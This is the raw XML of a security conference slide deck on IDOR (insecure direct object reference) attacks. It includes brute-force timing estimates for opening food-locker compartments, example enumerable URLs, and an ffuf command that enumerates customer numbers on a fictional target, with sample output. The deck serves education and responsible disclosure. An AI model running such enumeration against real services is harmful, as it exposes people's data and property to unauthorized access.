            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> (7 characters, all uppercase)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93567-81A1-9C95-E033-7FBB93F7211D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828548" y="1472534"/>
            <a:ext cx="6667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7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" baseline="30000" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>26</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> = 8,031,810,176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62FDA-0C75-67FD-8B35-93143406DE77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828548" y="2475813"/>
            <a:ext cx="10769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8,031,810,176 / 52 = 154,457,888 request guesses to open one locker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C8DE1-3A12-95B6-F4AE-C3EA4A9AC650}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828548" y="4156201"/>
            <a:ext cx="10769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+mj-lt"/>
              </a:rPr>
              <a:t>154,457,888/10,000 = 15,445 seconds (4.3 hours)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C0310-8A77-E053-A3D8-38AF8C0817EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828548" y="5836589"/>
            <a:ext cx="1076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+mj-lt"/>
              </a:rPr>
              <a:t>2h 8min (with probability)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="580856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112A2-7561-C6A3-9E59-E806515E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7" y="245897"/>
            <a:ext cx="12004606" cy="6366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E4B74-BC01-10F8-ABB3-9A3685B2AFF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8585201" y="4104887"/>
            <a:ext cx="3403600" cy="1754326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91 locations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50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60DC3-558C-C132-C8A7-FA49A6A66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5FC66F-6DF8-C5D9-7442-E57F44CF49F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="901700" y="598710"/>
            <a:ext cx="10452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PFFAEAD (7 characters, all upper)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1037E-5F9B-9147-835B-16DBB0E34698}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="901700" y="1665510"/>
            <a:ext cx="6667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7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" baseline="30000" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>26</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> = 8,031,810,176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2ADB1-A891-D80E-AE6A-0EF016E28FBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="901700" y="2732310"/>
            <a:ext cx="1076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+mj-lt"/>
              </a:rPr>
              <a:t>8,031,810,176 / (52 * 91) = 1,697,339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CF19E-53B5-DA98-EE25-67A173E79A82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="901700" y="3799110"/>
            <a:ext cx="1076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+mj-lt"/>
              </a:rPr>
              <a:t>1,697,339/10,000 = 170 seconds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1DC36-C7C7-B88C-9108-07AE5549077E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="901700" y="4865910"/>
            <a:ext cx="10769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+mj-lt"/>
              </a:rPr>
              <a:t>Open a random locker in a Cloud Kitchen location every 3 minutes.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="371649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32AD-EA2D-00D1-0A8D-D0345D4F2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36" y="580475"/>
            <a:ext cx="10890928" cy="1757855"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IDOR is categorized as Broken Object-Level Authorization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Endpoint uses a discernible pattern for access requests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71F6D-252A-4C3D-6BEE-4BA380559372}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="570271" y="2644098"/>
            <a:ext cx="7157883" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="BDCA8B"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="365760" tIns="182880" rIns="182880" bIns="18288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https://target.tld/profile?accountnumber=154976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56D1D-D38F-BDE8-A329-AA0B0AF95462}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="570271" y="3390872"/>
            <a:ext cx="7157883" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="BDCA8B"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="365760" tIns="182880" rIns="182880" bIns="18288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https://target.tld/assets/investor/20220802_10K.pdf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E59F11-7A2F-32FB-60EF-6C2462A3F2EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="570271" y="4137646"/>
            <a:ext cx="7157883" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="BDCA8B"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="365760" tIns="182880" rIns="182880" bIns="18288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https://target.tld/users/gssfmbzt/profile-picture.png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44414-96C9-238C-933C-DA1EE57857F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="570272" y="5631194"/>
            <a:ext cx="7157883" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="BDCA8B"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="365760" tIns="182880" rIns="182880" bIns="18288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https://target.tld/be3f1ca0/22/22-0-03302024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FBB0B-D40D-ABA3-1715-2884AF560987}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7865805" y="2644098"/>
            <a:ext cx="3987965" cy="1292662"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A35A6B"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="182880" rIns="182880" bIns="18288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Used to exploit Parler, Baidu, US DoD, Facebook, Instagram, Tesla, Dell, Google, and more.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CEFEA-29EF-E43D-DFAF-368531500D94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7865804" y="4061534"/>
            <a:ext cx="3987965" cy="2215991"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="608D7E"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="182880" rIns="182880" bIns="18288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"In the case of Parler, [...] URLs looked like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https://par.pw/v1/photo?id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NUM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and the ID could be sequentially increased to gather information..."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422BE-3430-A36F-543B-7A279C5ADB26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="570271" y="4884420"/>
            <a:ext cx="7157883" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="BDCA8B"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="365760" tIns="182880" rIns="182880" bIns="18288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https://target.tld/share/3225ac32-5c93-4b21-9a7b-e9db5283387c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98241-6101-B407-B9B8-2926225317C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357674" y="2754665"/>
            <a:ext cx="425196" cy="425196"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="608D7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>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT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6CBBA-F6F4-6193-C617-FB89073DC83B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357674" y="3501439"/>
            <a:ext cx="425196" cy="425196"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="608D7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>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT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B37F32-F686-1218-54F1-34C10D14D8CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357674" y="4248213"/>
            <a:ext cx="425196" cy="425196"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="608D7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>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT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79A64B-E4BB-3BE1-EA70-DAB4C2707784}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357674" y="4994987"/>
            <a:ext cx="425196" cy="425196"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="608D7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>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT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8C1FB-12C0-97C9-1B7E-BF2EC19CEA7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357674" y="5741761"/>
            <a:ext cx="425196" cy="425196"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="608D7E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b="1" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT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02383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C4554-B211-883F-DB67-80897633F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5" y="84723"/>
            <a:ext cx="11168270" cy="66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55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857CC-F87F-E30F-F400-53F746C31989}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="538783" y="889843"/>
            <a:ext cx="1111443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/>
              <a:t>"My name is Chuck McAuley I'm a security engineer at cloud kitchens. We were recently notified about a possible disclosure of a vulnerability in our locker systems through a tweet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0"/>
              <a:t>￼</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0"/>
              <a:t>Can you provide additional about this potential vulnerability? Or clarify what was actually disclosed at this talk? We also have a bug bounty program if you are interested in joining."</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3363275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BD6FF-FB48-058D-12C1-FDB1CC941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C39870-7F30-4602-12EC-1E06C48C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0"/>
            <a:ext cx="10890929" cy="4531489"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Watch for IDOR vulnerabilities in all things.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 creative in assessing enumeration techniques.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Spend some time thinking about impact to best articulate why the vulnerability is important.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3197926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DD3E7-A8C5-9AB4-8B8E-34FD4FC0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AECBA-3057-806D-020C-2BA41AB02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IDOR vulnerabilities shouldn't exist anymore, but they still do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Watch for patterns and sensitive data or access in URLs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Carefully consider impact, opportunities for exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use your skills for good, not evil</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don't forgot to have fun and enjoy what you do</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3481584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29E86-E3CE-95C2-2478-2A2B1BCD3412}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660992" y="1991625"/>
            <a:ext cx="10921408" cy="10738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/>
              <a:t>Hackventures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> with Josh: Having Fun with IDOR Attacks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407FC-8608-1CEC-B9CE-509B0D7F9756}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660990" y="5208324"/>
            <a:ext cx="110174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/>
              <a:t>I am the author of SANS SEC504: Hacker Tools, Techniques, and Incident Handling (GCIH). More at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>www.sans.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>/sec504.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5DD643-222C-DC29-9128-51BB5F700A14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660992" y="128373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Questions? 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F7F84-4F1B-1A3B-AF4F-AF45DA321FC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660992" y="2699511"/>
            <a:ext cx="10921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/>
              <a:t>Joshua Wright | josh@wr1ght.net</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3115576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D772D0-2D25-A753-F46E-5439A57B7B8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428624" y="4553451"/>
            <a:ext cx="11338560" cy="2123658"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E3E1E1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="137160" tIns="137160" rIns="137160" bIns="13716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$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>seq -w 0 9999999 | ffuf -w - -u http://warranty.falsimentis.com/warranty?customer-number=FUZZ -fl 91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...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0000669 [Status: 200, Size: 5243, Words: 956, Lines: 103]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0000971 [Status: 200, Size: 5233, Words: 957, Lines: 103]</a:t>
            </a:r>
          </a:p>
          <a:p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</a:rPr>
              <a:t>0001890 [Status: 200, Size: 5233, Words: 956, Lines: 103]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4EEFBD-AD83-555C-0D92-C0807BEA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Fuzz Faster U Fool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1C0773-8EC7-E7A2-77CC-53FE86E1F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671146"/>
            <a:ext cx="10890928" cy="2757636"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Ffuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> uses an input list to make rapid HTTP requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Replace the keyword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FUZZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> with the contents of the current list entry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Use a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0"/>
              <a:t>matcher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>OR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0"/>
              <a:t>filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> to capture responses that are interesting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="ffuf logo and mascot">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EB2111B-130B-CA66-3E0B-94383F132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478" y="104508"/>
            <a:ext cx="2701688" cy="12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9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1002-DCAF-8813-A251-E73F13B5A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9510C-6F94-AE87-DFA8-5BCB640E8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identify a request that uses a predictable pattern</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We enumerate the pattern to identify brute-force options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We test and filter responses to collect data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We assess the impact of the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642863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7FEA87-F943-9F05-A233-536944EE2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have some fun.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="158556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with red leaves&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{396447F5-B2E0-A12B-0018-719B6BA94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1CA20-96D2-FBDD-0AD0-409A88FC6C82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-36576" y="4494586"/>
            <a:ext cx="1219200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0" b="1" dirty="0">
                <a:latin typeface="Grandview" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial Black" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SEEKONK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="354315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74277-014D-2434-CCA7-EC061DBB7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6" y="140109"/>
            <a:ext cx="11832607" cy="65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93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ceipt with text and numbers&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F193BC94-2BF8-05A4-06E3-2BC63997D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68" y="0"/>
            <a:ext cx="3692769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C69A6C5-0E6F-B7A3-FAD1-AF799738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interesting about this restaurant check?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="863478446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13292</TotalTime>
  <Words>2177</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>219</Paragraphs>
  <Slides>34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.SF NS</vt:lpstr>
      <vt:lpstr>Aptos</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Gill Sans MT</vt:lpstr>
      <vt:lpstr>Grandview</vt:lpstr>
      <vt:lpstr>Grandview Display</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Nunito</vt:lpstr>
      <vt:lpstr>DashVTI</vt:lpstr>
      <vt:lpstr>Hackventures with Josh</vt:lpstr>
      <vt:lpstr>Let's talk about IDOR vulnerabilities.</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Fuzz Faster U Fool</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Let's have some fun.</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>What is interesting about this restaurant check?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>SkyTab IDOR</vt:lpstr>
      <vt:lpstr>Skytapped</vt:lpstr>
      <vt:lpstr>Skytapped Data</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Watch for IDOR vulnerabilities in all things.  Be creative in how you collect data with regard to timing and frequency of requests.  Always consider the collective impact when assessing vulnerabilities.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for IDOR vulnerabilities in all things.  Be creative in assessing enumeration techniques.   Spend some time thinking about impact to best articulate why the vulnerability is important.</vt:lpstr>
      <vt:lpstr>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Joshua Wright</cp:lastModifiedBy>
  <cp:revision>128</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-24T20:52:18Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-23T01:14:19Z</dcterms:modified>
</cp:coreProperties>
</file>